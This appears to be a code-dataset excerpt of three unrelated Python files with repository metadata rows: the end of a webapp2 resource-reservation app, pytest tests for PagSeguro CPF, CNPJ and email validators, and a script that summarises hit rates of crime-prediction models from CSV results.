tag = self.request.get('tag').lower()
resources = Resource.query().order(-Resource.last_reservation_time).fetch()
filtered_resources = []
for r in resources:
tags = [t.lower().strip() for t in r.tags]
if tag in tags:
filtered_resources.append(r)
template_values = {
'tag': tag,
'resources': filtered_resources,
}
template = JINJA_ENVIRONMENT.get_template('tag.html')
self.response.write(template.render(template_values))
'''
SearchResource Handler enables the function of searching existing resources by name
'''
class SearchResource(webapp2.RequestHandler):
def get(self):
template_values = {}
template = JINJA_ENVIRONMENT.get_template('searchResource.html')
self.response.write(template.render(template_values))
def post(self):
name = self.request.get('name').lower()
resources = Resource.query().order(-Resource.last_reservation_time).fetch()
results = []
for r in resources:
resource_name = r.name.strip().lower()
if name in resource_name:
results.append(r)
print resources
template_values = {
'name': name,
'resources': results,
}
template = JINJA_ENVIRONMENT.get_template('searchResource.html')
self.response.write(template.render(template_values))
# [START app]
app = webapp2.WSGIApplication([
('/', LandingPage),
('/newResource.html', CreateResource),
('/resource.html', ViewResource),
('/editResource.html', EditResource),
('/newReservation.html', CreateReservation),
('/user.html', ViewUser),
('/index.html', DeleteReservation),
('/tag.html', ResourcesByTag),
('/rss.html', GenerateRSS),
('/searchResource.html', SearchResource),
], debug=True)
# [END app]
| 39.808108 | 136 | 0.63263 | 1,630 | 14,729 | 5.552147 | 0.160736 | 0.036464 | 0.032486 | 0.027845 | 0.499558 | 0.443978 | 0.365635 | 0.330608 | 0.242762 | 0.199558 | 0 | 0.005042 | 0.259352 | 14,729 | 369 | 137 | 39.915989 | 0.824549 | 0.068233 | 0 | 0.383142 | 0 | 0.003831 | 0.106896 | 0.01376 | 0.003831 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.042146 | null | null | 0.003831 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c6a40a4bea2c4e73231cb976a84217ada08384c | 2,098 | py | Python | tests/test_utils.py | Guillerbr/python-pagseguro | 279eacf251e99a2f15d665f8193fcad0be6ea0bf | [
"MIT"
] | 115 | 2015-02-19T22:17:44.000Z | 2019-07-24T17:31:30.000Z | tests/test_utils.py | rubens8848/python-pagseguro | 08a8aa7f934b16d00948ead17a0e470a88f2479f | [
"MIT"
] | 49 | 2015-03-04T00:53:31.000Z | 2019-07-13T16:41:22.000Z | tests/test_utils.py | rubens8848/python-pagseguro | 08a8aa7f934b16d00948ead17a0e470a88f2479f | [
"MIT"
] | 53 | 2015-01-12T22:13:33.000Z | 2019-07-20T01:52:48.000Z | # -*- coding: utf-8 -*-
import datetime
from pagseguro.utils import (is_valid_cpf, is_valid_cnpj, is_valid_email,
parse_date)
from pagseguro.exceptions import PagSeguroValidationError
import pytest
from dateutil.tz import tzutc
def test_is_valid_email():
valid = 'test@email.com'
valid2 = u'user@росси́я.ро'
not_valid = '@asd.com'
not_valid2 = 'bad'
not_valid3 = u'user@росси́я'
with pytest.raises(PagSeguroValidationError):
is_valid_email(not_valid)
with pytest.raises(PagSeguroValidationError):
is_valid_email(not_valid2)
with pytest.raises(PagSeguroValidationError):
is_valid_email(not_valid3)
assert is_valid_email(valid) == 'test@email.com'
assert is_valid_email(valid2) == u'user@росси́я.ро'
def test_parse_date():
# DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S'
date_str = '2016-10-10T10:10:10'
assert parse_date(date_str) == datetime.datetime(2016, 10, 10, 10, 10, 10,
tzinfo=tzutc())
def test_is_valid_cpf():
valid = '041.684.826-50'
valid2 = '04168482650'
bad = 'bla///'
max_digits = '1111111111111111111111111'
invalid_cpf = '040.684.826-50'
with pytest.raises(PagSeguroValidationError):
is_valid_cpf(bad)
with pytest.raises(PagSeguroValidationError):
is_valid_cpf(max_digits)
with pytest.raises(PagSeguroValidationError):
is_valid_cpf(invalid_cpf)
assert is_valid_cpf(valid) == valid
assert is_valid_cpf(valid2) == '04168482650'
def test_is_valid_cnpj():
valid = '31331052000174'
valid2 = '72.168.117/0001-90'
invalid = '///'
digits = '1111111'
wrong_number = '31331052000175'
with pytest.raises(PagSeguroValidationError):
is_valid_cnpj(invalid)
with pytest.raises(PagSeguroValidationError):
is_valid_cnpj(digits)
with pytest.raises(PagSeguroValidationError):
is_valid_cnpj(wrong_number)
assert is_valid_cnpj(valid) == '31331052000174'
assert is_valid_cnpj(valid2) == '72168117000190'
| 26.897436 | 78 | 0.674452 | 259 | 2,098 | 5.227799 | 0.274131 | 0.108567 | 0.106352 | 0.265879 | 0.502954 | 0.426883 | 0.426883 | 0.121861 | 0 | 0 | 0 | 0.11253 | 0.216397 | 2,098 | 77 | 79 | 27.246753 | 0.709246 | 0.028122 | 0 | 0.173077 | 0 | 0 | 0.130157 | 0.012279 | 0 | 0 | 0 | 0 | 0.134615 | 1 | 0.076923 | false | 0 | 0.096154 | 0 | 0.173077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c6dab3b29d248c78a200aec1e3449a5aeb04604 | 33,383 | py | Python | sandbox/riskModelsResultsEval.py | danbirks/PredictCode | b4d7010d13706c771ba57437e9c7589e5c94329b | [
"Artistic-2.0"
] | null | null | null | sandbox/riskModelsResultsEval.py | danbirks/PredictCode | b4d7010d13706c771ba57437e9c7589e5c94329b | [
"Artistic-2.0"
] | null | null | null | sandbox/riskModelsResultsEval.py | danbirks/PredictCode | b4d7010d13706c771ba57437e9c7589e5c94329b | [
"Artistic-2.0"
] | 2 | 2020-01-28T23:02:54.000Z | 2020-02-03T16:04:38.000Z | # -*- coding: utf-8 -*-
"""
Created on Wed May 15 10:22:47 2019
@author: lawdfo
Purpose:
Read in the csv results file generated by (e.g.) riskModelsParamSweep.py
and report back some useful statistics.
"""
# Some fairly standard modules
import os, csv, lzma
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import descartes
from itertools import product
from collections import Counter, defaultdict
import datetime
import csv
import random
import time
from copy import deepcopy
import statistics
# The geopandas module does not come standard with anaconda,
# so you'll need to run the anaconda prompt as an administrator
# and install it via "conda install -c conda-forge geopandas".
# That installation will include pyproj and shapely automatically.
# These are useful modules for plotting geospatial data.
import geopandas as gpd
import pyproj
import shapely.geometry
# These modules are useful for tracking where modules are
# imported from, e.g., to check we're using our local edited
# versions of open_cp scripts.
import sys
import inspect
import importlib
# In order to use our local edited versions of open_cp
# scripts, we insert the parent directory of the current
# file ("..") at the start of our sys.path here.
sys.path.insert(0, os.path.abspath(".."))
# Elements from PredictCode's custom "open_cp" package
import open_cp
"""
import open_cp.geometry
import open_cp.plot
import open_cp.sources.chicago as chicago
import open_cp.retrohotspot as retro
import open_cp.prohotspot as phs
import open_cp.knox
"""
# Load custom functions that make dealing with datetime and timedelta easier
from crimeRiskTimeTools import generateDateRange, \
generateLaterDate, \
generateEarlierDate, \
getTimedPointsInTimeRange, \
getSixDigitDate, \
_day
"""
Expected data format of input CSV file, by column:
Header name Type Typical contents
dataset str Chicago
event_types str BURGLARY
cell_width int 100
eval_date np.datetime64 2016-03-01
train_len str 8W
test_len str 1D
coverage_rate float 0.01/0.02/0.05/0.1
test_events int 3/2/5/etc
hit_count int 1/2/0/etc
hit_pct float 0.33333 etc
model str naivecount/phs/etc
rand_seed int
rhs_bandwidth int
phs_time_unit str 1 weeks
phs_time_band str 4 weeks
phs_dist_unit int 100
phs_dist_band int 400
phs_weight str linear
"""
csv_data_types = [str, \
str, \
int, \
np.datetime64, \
str, \
str, \
float, \
int, \
int, \
float, \
str, \
int, \
int, \
str, \
str, \
int, \
int, \
str]
def splitDataByTimespans(datalist, timespan, dateinfoname="eval_date"):
print("Performing splitDataByTimespans")
date_list = sorted(set([d[dateinfoname] for d in datalist]))
earliest_date = date_list[0]
latest_date = date_list[-1]
daterange_list = generateDateRange(start=earliest_date,
end=latest_date+_day,
step=timespan)
data_by_daterange = defaultdict(list)
for d in datalist:
d_time = d[dateinfoname]
for t in daterange_list:
if d_time >= t and d_time < generateLaterDate(t, timespan):
data_by_daterange[t].append(d)
break
print("Ending splitDataByTimespans")
return data_by_daterange
"""
Each element of output should have this info:
earliest test date of range
time band
dist band
avg hit rate
"""
def getPhsSpanStats(datalist, timespan):
print("Performing getPhsSpanStats")
data_by_daterange = splitDataByTimespans(datalist, timespan)
phs_band_rate_summary = []
for daterange in data_by_daterange:
hit_rates = getPhsHitRates(data_by_daterange[daterange])
for bp in hit_rates:
phs_band_rate_summary.append((daterange, bp[0], bp[1], hit_rates[bp]["avg_hit_rate"]))
print("Ending getPhsSpanStats")
return phs_band_rate_summary
def getModelSpanStats(datalist, timespan, model):
print("Performing getModelSpanStats")
recognized_model_list = ["random", "naive", "ideal", "phs"]
if model not in recognized_model_list:
print("model required for getModelSpanStats")
sys.exit(1)
if model=="phs":
return getPhsSpanStats(datalist, timespan)
data_by_daterange = splitDataByTimespans(datalist, timespan)
model_stats = []
for daterange, data in data_by_daterange.items():
model_stats.append((daterange, getAvgHitRates(data)))
print("Ending getModelSpanStats")
return model_stats
"""
Each element of output should have this info:
coverage
earliest test date of range
time band
dist band
avg hit rate
"""
def writeModelSummaryCsv(datalists_by_cov, timespan, model, csvname = "temp.csv"):
print("Performing writeModelSummaryCsv")
rate_summaries_by_cov = dict()
for cov, datalist in datalists_by_cov.items():
rate_summaries_by_cov[cov] = getModelSpanStats(datalist, timespan, model)
with open(csvname,"w") as csvf:
writer = csv.writer(csvf, delimiter=",", lineterminator="\n")
for cov, rate_summary in rate_summaries_by_cov.items():
for d in rate_summary:
writer.writerow([cov] + list(d))
print("Ending writeModelSummaryCsv")
sys.exit(0)
def writePhsVariabilityCsv(datalists_by_cov, timespan, csvname = "temp.csv"):
print("Performing writePhsVariabilityCsv")
bp_rate_summaries_by_cov = dict()
for cov, datalist in datalists_by_cov.items():
bp_rate_summaries_by_cov[cov] = getPhsSpanStats(datalist, timespan)
rates_by_covtimedist = defaultdict(list)
for cov, rate_summary in bp_rate_summaries_by_cov.items():
for entry in rate_summary:
rates_by_covtimedist[(cov, entry[1], entry[2])].append(entry[3])
covtimedist_trios = sorted(rates_by_covtimedist)
num_rates_list = [len(rates_by_covtimedist[x]) for x in covtimedist_trios]
num_rates = num_rates_list[0]
if not all([x==num_rates for x in num_rates_list]):
print("Error! Not all (cov, time, dist) trios have same number of results!")
print(num_rates_list)
sys.exit(1)
ratestats_by_covtimedist = dict()
for covtimedist in covtimedist_trios:
ratelist = rates_by_covtimedist[covtimedist]
rate_avg = sum(ratelist)/num_rates
rate_std = statistics.stdev(ratelist)
rate_var = statistics.variance(ratelist)
ratestats_by_covtimedist[covtimedist] = (rate_avg, rate_std, rate_var)
with open(csvname,"w") as csvf:
writer = csv.writer(csvf, delimiter=",", lineterminator="\n")
for covtimedist, ratestats in ratestats_by_covtimedist.items():
writer.writerow(list(covtimedist) + list(ratestats))
print(" ".join([str(x) for x in list(covtimedist) + list(ratestats)]))
print("Ending writePhsVariabilityCsv")
sys.exit(0)
# datalist = list of results for PHS
# timespan = how frequently to check scores. Do we look at the top n models
# from each day, or averaged over each month, etc
# topnum = how many of the top models we consider successful. Top 10? Top 1?
def checkPhsConsistency(datalist, timespan, topnum):
print("Performing checkPhsConsistency")
data_by_daterange = splitDataByTimespans(datalist, timespan)
#best_overallrate_bps = []
best_avgrate_bps = []
for daterange in data_by_daterange:
rate_info = getPhsHitRates(data_by_daterange(daterange))
#d_sort_overallrate = sorted(rate_info.items(), key=lambda ri: ri[1]["overall_hit_rate"], reverse=True)
d_sort_avgrate = sorted(rate_info.items(), key=lambda ri: ri[1]["avg_hit_rate"], reverse=True)
#best_bp_overallrate = d_sort_overallrate[:topnum]
#for d in d_sort_overallrate[topnum:]:
# if d[1]["overall_hit_rate"] < best_bp_overallrate[-1][1]["overall_hit_rate"]:
# break
# best_bp_overallrate.append(d)
best_bp_avgrate = d_sort_avgrate[:topnum]
for d in d_sort_avgrate[topnum:]:
if d[1]["avg_hit_rate"] < best_bp_avgrate[-1][1]["avg_hit_rate"]:
break
best_bp_avgrate.append(d)
#best_overallrate_bps.append(best_bp_overallrate)
best_avgrate_bps.append(best_bp_avgrate)
#findMinimalPhsBandCovering(best_overallrate_bps, daterange_list)
findMinimalPhsBandCovering(best_avgrate_bps, data_by_daterange.keys())
def findMinimalPhsBandCovering(best_bps, daterange_list):
print("Performing findMinimalPhsBandCovering")
covered_span_list = []
covered_span_dates = [[]]
covering_bps = []
bp_set = set([x[0] for x in best_bps[0]])
running_span_count = 0
for i, bp_info in enumerate(best_bps):
new_bp_set = bp_set & set(x[0] for x in bp_info)
# If set is 0, we can no longer cover current time with top choices
if len(new_bp_set) == 0:
covered_span_list.append(int(running_span_count+0))
running_span_count = 1
covered_span_dates.append([])
covering_bps.append(deepcopy(bp_set))
bp_set = set(x[0] for x in bp_info)
else:
bp_set = new_bp_set
running_span_count += 1
covered_span_dates[-1].append(daterange_list[i])
covered_span_list.append(int(running_span_count+0))
covering_bps.append(deepcopy(bp_set))
print(covered_span_list)
print(covered_span_dates)
print(covering_bps)
sorted_covered_span_list = sorted(covered_span_list)
print(sorted_covered_span_list[0])
print(sorted_covered_span_list[-1])
#sys.exit(0)
pass
"""
getPhsHitRates
Input: "datalist" = list where each entry is a dictionary containing the
information from a line of the csv results file (casted
as the appropriate data type) as well as "param_pair"
which is a tuple of the time and dist bandwidths.
Note: Ideally this datalist is a subset of the full csv data, so that
hit rates ar calculated over smaller timespans, e.g. monthly
Output: "info_by_band_pair" = dict that maps bandwidth pairs ("bp") to:
"bands": same as key; can be useful if just grabbing values
"num_tests": Number of experiments/tests/evaluations performed.
All bp's within a datalist fed into this function should end
up with the same number of tests -- I can't think of a reason
why this wouldn't happen. However, note that this number MAY
change across multiple runs of this function with different
data subsets. For example, maybe you calculate over every
month, but months have different numbers of days.
"total_events": Total number of events (i.e. crimes) in the data.
This is calculated by adding the number for the first time
each date is witnessed. So again, it's important that all bp's
are tested on all the same days.
"total_hits": Total number of hits achieved by the bp's model.
"total_rates": Sum of all daily(?) hit rates. This number is
essentially useless on its own, but used for calculating avg.
"avg_hit_rate": Average of all daily hit rates, calculated as
total_rates/num_tests
("overall_hit_rate"): A different average hit rate, being the total
number of hits divided by the total number of events. This
was removed from use (commented out) once we decided this
metric was less useful than avg_hit_rate, since this could be
swayed by a generally poor model that rarely performs extremely
well.
"""
def getPhsHitRates(datalist):
print("Performing getPhsHitRates")
# Obtain set of bandwidths
band_pair_list = sorted(set([d["param_pair"] for d in datalist]))
# Instantiate info to obtain
info_by_band_pair = dict()
for bp in band_pair_list:
info_by_band_pair[bp] = dict([\
("bands", bp),\
("num_tests", 0),\
("total_events", 0),\
("total_hits", 0),\
("total_rates", float(0))\
])
# Update info via running counts for each bandwidth pair
for result in datalist:
bp = result["param_pair"]
info_by_band_pair[bp]["num_tests"] += 1
info_by_band_pair[bp]["total_events"] += result["test_events"]
info_by_band_pair[bp]["total_hits"] += result["hit_count"]
if result["test_events"] > 0:
info_by_band_pair[bp]["total_rates"] += result["hit_count"]/result["test_events"]
# Confirm all bandwidth pairs had the same number of tests
num_tests_per_bp = [info_by_band_pair[bp]["num_tests"] for bp in band_pair_list]
if len(set(num_tests_per_bp)) != 1:
print("Error! Some bandwidth pairs have different numbers of tests!")
print(Counter(num_tests_per_bp))
sys.exit(1)
num_tests = num_tests_per_bp[0]
# Compute the average hit rates for each bandwidth pair
for bp in band_pair_list:
info_by_band_pair[bp]["avg_hit_rate"] = info_by_band_pair[bp]["total_rates"]/num_tests
# The following deprecated code computes the overall hit rate,
# instead of averaging the hit rates
#if info_by_band_pair[bp]["total_events"] == 0:
# info_by_band_pair[bp]["overall_hit_rate"] == 0
#else:
# info_by_band_pair[bp]["overall_hit_rate"] = info_by_band_pair[bp]["total_hits"]/info_by_band_pair[bp]["total_events"]
# Return info
return info_by_band_pair
# Note: 0 hits for 0 events gets counted as a hit rate of 0.
# Perhaps it should be discarded instead?
# But then what if the entire span has 0 events?
def getAvgHitRates(datalist):
print("Performing getAvgHitRates")
num_tests = len(datalist)
total_rates = sum([result["hit_count"]/result["test_events"] for result in datalist if result["test_events"]!=0])
for i, result in enumerate(datalist):
print(result)
toprint = [result["hit_count"], result["test_events"]]
if toprint[1] == 0:
toprint.append(0)
else:
toprint.append(toprint[0]/toprint[1])
print("\t".join([str(x) for x in toprint]))
print(total_rates/num_tests)
return total_rates/num_tests
"""
getDataByCovRate
Given a path to csv results from running risk models,
return a dictionary where keys are coverage rates and
values are the rows of info with that coverage from the csv.
"""
def getDataByCovRate(results_full_path,
header_types = csv_data_types,
earliest_eval_date = None,
latest_eval_date = None,
):
# Keep track of total number of events (i.e., crimes)
total_event_count = 0
dates_seen = []
model_param_names = []
cov_rates = set()
# Instantiate a mapping from coverage rate to {another mapping of results}.
# That other mapping will be from model to results.
# And, those results will be a list of mappings, each entry in the list being
# a different row from the csv results
datadicts_by_cov_rate = defaultdict(lambda: defaultdict(list))
# Open csv output and start reading it
with open(results_full_path, newline="") as f:
reader = csv.reader(f)
# Obtain column names from header in first line
header = next(reader, None)
# Read each line of data
for dataline in reader:
# Instantiate a map from col name to data, for this line
dataline_dict = dict()
# All data is currently in string form.
# Use header_types to cast the data appropriately.
for i,d in enumerate(dataline):
# Default is empty string
casted_data = ""
# Things like int("") don't work, so we catch that here
if d != "":
casted_data = header_types[i](d)
# Transform data into str/int/float/datetime64 before storing it
dataline_dict[header[i]] = casted_data
# Keep track of how many eval_date's we've seen,
# and how many events (crimes) there have been in total
# If date is outside of desired range, continue
dataline_date = dataline_dict["eval_date"]
if earliest_eval_date != None and dataline_date < earliest_eval_date:
continue
if latest_eval_date != None and latest_eval_date < dataline_date:
continue
if dataline_date not in dates_seen:
total_event_count += dataline_dict["test_events"]
dates_seen.append(dataline_date)
# Grab coverage and model, since we'll use those a lot
dataline_cov = dataline_dict["coverage_rate"]
if dataline_cov not in cov_rates:
cov_rates.add(dataline_cov)
dataline_model = dataline_dict["model"]
# Grab the bandwidths for PHS results, store them as "param_pair"
if dataline_model == "phs":
time_band = int(dataline_dict["phs_time_band"][:-1])
dist_band = dataline_dict["phs_dist_band"]
dataline_dict["param_pair"] = (time_band, dist_band)
model_param_name = dataline_model
if dataline_model == "random":
model_param_name += "-" + str(dataline_dict["rand_seed"])
elif dataline_model == "phs":
model_param_name += "-" + "-".join([str(x) for x in dataline_dict["param_pair"]])
if model_param_name not in model_param_names:
model_param_names.append(model_param_name)
# Store dict so they're first sorted by coverage then by model type
datadicts_by_cov_rate[dataline_cov][model_param_name].append(dataline_dict)
return datadicts_by_cov_rate, dates_seen, model_param_names, sorted(cov_rates)
def graphHitRatesOverTime(results_full_path):
datadicts_by_cov_rate, exp_dates, model_names, cov_rates = getDataByCovRate(results_full_path)
for cov_rate in cov_rates:
# Declare figure
print("Declaring figure for graphHitRatesOverTime...")
fig, ax = plt.subplots(figsize=(12,6))
names_for_legend = []
cov_results_all_models = datadicts_by_cov_rate[cov_rate]
num_dates = len(exp_dates)
num_models = len(model_names)
for mn in model_names:
if len(cov_results_all_models[mn]) != num_dates:
print("Error!")
print(f"Model: {mn}")
print(f"Expected number of experiments: {num_dates}")
print(f"Found number of experiments: {len(cov_results_all_models[mn])}")
sys.exit(0)
result_matrix = np.zeros((num_models, num_dates))
for mn_index, mn in enumerate(model_names):
names_for_legend.append(mn)
model_results = cov_results_all_models[mn]
for mr_index, mr in enumerate(model_results):
result_matrix[mn_index, mr_index] = mr["hit_pct"]
for row_num, row in enumerate(result_matrix):
ax.plot(exp_dates, row)
ax.legend(names_for_legend)
ax.tick_params(axis='x', rotation=90)
ax.set_title(f"Hit rates over time, coverage {cov_rate}")
"""
result_matrix = np.zeros((len(all_exp_results[0]), len(all_exp_results)))
for exp_num, exp in enumerate(all_exp_results):
for model_num, model_result in enumerate(exp):
result_matrix[model_num, exp_num] = model_result[0][coverage_cell_index]
for row_num, row in enumerate(result_matrix):
ax.plot(test_data_dates, row + (results_count_offset * row_num) )
names_for_legend.append(all_exp_results[0][row_num][1])
x_axis_size = len(hit_rates_dict[model_names[0]][0])
x_axis_values = np.linspace(0,1,x_axis_size)
print(x_axis_size)
for mn in model_names:
for hr in hit_rates_dict[mn]:
ax.plot(x_axis_values, hr)
for mr in model_runs_list[mn]:
names_for_legend.append(mr)
ax.legend(names_for_legend)
"""
return
"""
Copied snippets from riskModelsCompare
Still working out this section...
"""
def graphCoverageVsHitRate(hit_rates_dict, model_runs_list, model_names):
"""
print(len(hit_rates_dict))
for m in hit_rates_dict:
print(m)
print(len(hit_rates_dict[m]))
print(len(hit_rates_dict[m][0]))
print(len(model_runs_list))
print(model_runs_list)
"""
model_hit_rate_pairs = []
for mn in model_names:
model_hit_rate_pairs += list(zip(model_runs_list[mn], hit_rates_dict[mn]))
#hit_rates_flat += hit_rates_dict[mn]
#model_runs_flat += model_runs_list[mn]
#print(len(hit_rates_flat))
#print(len(model_runs_flat))
print(len(model_hit_rate_pairs))
### DECLARE FIGURE FOR HITRATE/COVERAGE
# !!! I should add an option for the x-axis of the figure!!!
#results_count_offset = .025
#results_rate_offset = .005
#results_count_offset = 0
#results_rate_offset = 0
# new version
# Declare figure
print("Declaring figure for graphCoverageVsHitRate...")
fig, ax = plt.subplots(figsize=(12,6))
names_for_legend = []
x_axis_size = len(hit_rates_dict[model_names[0]][0])
x_axis_values = np.linspace(0,1,x_axis_size)
print(x_axis_size)
for mn in model_names:
for hr in hit_rates_dict[mn]:
ax.plot(x_axis_values, hr)
for mr in model_runs_list[mn]:
names_for_legend.append(mr)
ax.legend(names_for_legend)
return
"""
result_matrix = np.zeros((len(all_exp_results[0]), len(all_exp_results)))
for exp_num, exp in enumerate(all_exp_results):
for model_num, model_result in enumerate(exp):
result_matrix[model_num, exp_num] = model_result[0][coverage_cell_index]
for row_num, row in enumerate(result_matrix):
ax.plot(test_data_dates, row + (results_count_offset * row_num) )
names_for_legend.append(all_exp_results[0][row_num][1])
#ax.legend(names_for_legend)
ax.tick_params(axis='x', rotation=90)
# one of the orig sections from riskModelsCompare
# Declare figure
print("Declaring figure...")
fig, ax = plt.subplots(figsize=(12,6))
names_for_legend = []
result_matrix = np.zeros((len(all_exp_results[0]), len(all_exp_results)))
for exp_num, exp in enumerate(all_exp_results):
for model_num, model_result in enumerate(exp):
result_matrix[model_num, exp_num] = model_result[0][coverage_cell_index]
for row_num, row in enumerate(result_matrix):
ax.plot(test_data_dates, row + (results_count_offset * row_num) )
names_for_legend.append(all_exp_results[0][row_num][1])
#ax.legend(names_for_legend)
ax.tick_params(axis='x', rotation=90)
# Declare figure
print("Declaring figure...")
fig, ax = plt.subplots(figsize=(12,6))
names_for_legend = []
#xcoords = test_data_dates
coverage_rate = 0.10
coverage_cell_index = int(num_cells_region * coverage_rate)-1
print("reg {}".format(num_cells_region))
print("cov {}".format(coverage_rate))
print("cci {}".format(coverage_cell_index))
result_matrix = np.zeros((len(all_exp_results[0]), len(all_exp_results)))
for exp_num, exp in enumerate(all_exp_results):
if test_data_counts[exp_num] == 0:
continue
for model_num, model_result in enumerate(exp):
result_matrix[model_num, exp_num] = \
model_result[0][coverage_cell_index]/test_data_counts[exp_num]
for row_num, row in enumerate(result_matrix):
ax.plot(test_data_dates, row + (results_rate_offset * row_num) )
names_for_legend.append(all_exp_results[0][row_num][1])
#ax.legend(names_for_legend)
ax.tick_params(axis='x', rotation=90)
"""
def main():
datadir = os.path.join("..", "..", "Data")
#results_fname = "results_190515_Chicago_160101_1M_1D.csv"
#results_fname = "results_190517_Chicago_020101_1Y_1D.csv"
#results_fname = "results_190517_Chicago_020101_1Y_3D.csv"
#results_fname = "results_190522_Chicago_020101_1Y_7D.csv"
#results_fname = "results_190621_Chicago_160301_1M_1D.csv"
#results_fname = "results_190621_Chicago_160301_9M_1D.csv"
#results_fname = "temp_results_190621_Chicago_010301_17Y_1D.csv"
#results_fname = "results_190621_Chicago_010301_17Y_1D.csv"
results_fname = "results_190628_Chicago_130101_5Y_1D.csv"
# Only include results of tests later OR EQUAL to this date
earliest_eval_date = np.datetime64("2013-01-01")
# Only include results of tests earlier BUT NOT EQUAL to this date
latest_eval_date = None
results_full_path = os.path.join(datadir, results_fname)
# Keep track of dates seen in the output data
dates_seen = set()
datadicts_by_cov_rate = getDataByCovRate(results_full_path)
# Determine the number of evaluation dates in the data
# We expect this to equal the number of instances of random/naive/ideal
# experiments, and also the number of phs experiments when multiplied by
# the number of phs parameter combinations.
num_dates = len(dates_seen)
print(num_dates)
earliest_date_seen =sorted(dates_seen)[0]
latest_date_seen =sorted(dates_seen)[-1]
print(earliest_date_seen)
print(latest_date_seen)
phsdicts_by_cov_rate = dict([(cov, d["phs"]) for cov, d in datadicts_by_cov_rate.items()])
naivedicts_by_cov_rate = dict([(cov, d["naive"]) for cov, d in datadicts_by_cov_rate.items()])
create_naive_csv_summary = True
if create_naive_csv_summary:
timespan = "1M"
date_today = datetime.date.today()
date_today_str = getSixDigitDate(date_today)
earliest_date_str = getSixDigitDate(earliest_date_seen)
latest_date_str = getSixDigitDate(latest_date_seen)
sumcsv_base = f"ratesummary_xsr_nai_{date_today_str}_{earliest_date_str}_{latest_date_str}_{timespan}.csv"
sumcsvname = os.path.join(datadir, sumcsv_base)
writeModelSummaryCsv(naivedicts_by_cov_rate, timespan, "naive", csvname=sumcsvname)
sys.exit(0)
create_phs_csv_summary = False
if create_phs_csv_summary:
timespan = "1M"
date_today = datetime.date.today()
date_today_str = getSixDigitDate(date_today)
earliest_date_str = getSixDigitDate(earliest_date_seen)
latest_date_str = getSixDigitDate(latest_date_seen)
phssumcsv_base = f"ratesummary_xsr_phs_{date_today_str}_{earliest_date_str}_{latest_date_str}_{timespan}.csv"
phssumcsvname = os.path.join(datadir, phssumcsv_base)
#writePhsSummaryCsv(phs_list, timespan, csvname=phssumcsvname)
writeModelSummaryCsv(phsdicts_by_cov_rate, timespan, "phs", csvname=phssumcsvname)
sys.exit(0)
create_phs_csv_var = True
if create_phs_csv_var:
timespan = "1M"
date_today = datetime.date.today()
date_today_str = getSixDigitDate(date_today)
earliest_date_str = getSixDigitDate(earliest_date_seen)
latest_date_str = getSixDigitDate(latest_date_seen)
phssumcsv_base = f"ratevar_{date_today_str}_{earliest_date_str}_{latest_date_str}_{timespan}.csv"
phssumcsvname = os.path.join(datadir, phssumcsv_base)
#writePhsSummaryCsv(phs_list, timespan, csvname=phssumcsvname)
writePhsVariabilityCsv(phsdicts_by_cov_rate, timespan, phssumcsvname)
sys.exit(0)
all_model_names = ["random", "naivecount", "ideal", "rhs", "phs"]
basic_model_names = all_model_names[:3]
for cov, datadicts_by_model in datadicts_by_cov_rate.items():
print(f"Coverage rate: {cov}")
# Get overall result summaries for basic models
for model_name in basic_model_names:
if model_name in datadicts_by_model:
# Obtain list of results for this (coverage, model) combo
datalist = datadicts_by_model[model_name]
# Confirm that we have the expected number of results
if len(datalist) != num_dates:
print("Error! Unexpected number of results!")
print(f"Number expected per model: {num_dates}")
print(f"Number seen for model {model_name}: {len(datalist)}")
sys.exit(1)
# ("Hit" = event in testing period within model's top cov% cells)
# Total number of successful "hits"
total_hit_count = sum([d["hit_count"] for d in datalist])
# Total possible number of "hits"
total_hit_poss = sum([d["test_events"] for d in datalist])
# Overall hit rate
total_hit_rate = total_hit_count/total_hit_poss
# Average of all individual hit rates
average_hit_rate = sum(d["hit_pct"] for d in datalist)/num_dates
print(f"\tModel: {model_name}")
#print(f"\t\tTotal hit rate: {total_hit_count}/{total_hit_poss} = {total_hit_rate:6.4f}")
print(f"\t\tAverage hit rate: {average_hit_rate:6.4f}")
# Generate a table of results for all PHS bandwidth pairs tested
if "phs" in datadicts_by_model:
phs_list = datadicts_by_model["phs"]
# phs_list is what should be fed into checkPhsConsistency etc
#checkPhsConsistency(phs_list, "1M", 10)
#sys.exit(0)
#continue
#getPhsStats(phs_list, "1M")
#sys.exit(0)
print("0\t" + "\t".join([str(x) + " weeks" for x in range(1,9)]))
best_sum_dist_time = (-1, 0, 0)
best_avg_dist_time = (-1, 0, 0)
for dist_band in range(100,1100,100):
toprint_list = [str(dist_band)]
for time_band in range(1,9):
#total_hit_count = sum(d["hit_count"] for d in phs_list if d["param_pair"]==(time_band, dist_band))
#total_hit_rate = total_hit_count/total_event_count
hit_rate_sum = sum(d["hit_pct"] for d in phs_list if d["param_pair"]==(time_band, dist_band))
hit_rate_avg = hit_rate_sum/num_dates
#toprint_list.append(f"{total_hit_rate:6.4f},{hit_rate_avg:6.4f}")
toprint_list.append(f"{hit_rate_avg:6.4f}")
#if total_hit_rate > best_sum_dist_time[0]:
# best_sum_dist_time = (total_hit_rate, dist_band, time_band)
if hit_rate_avg > best_avg_dist_time[0]:
best_avg_dist_time = (hit_rate_avg, dist_band, time_band)
print("\t".join(toprint_list))
#print(f"Best total hit rate result: {best_sum_dist_time[0]:6.4f} {best_sum_dist_time[1:]}")
print(f"Best average hit rate result: {best_avg_dist_time[0]:6.4f} {best_avg_dist_time[1:]}")
sys.exit(0)
if __name__ == "__main__":
main()
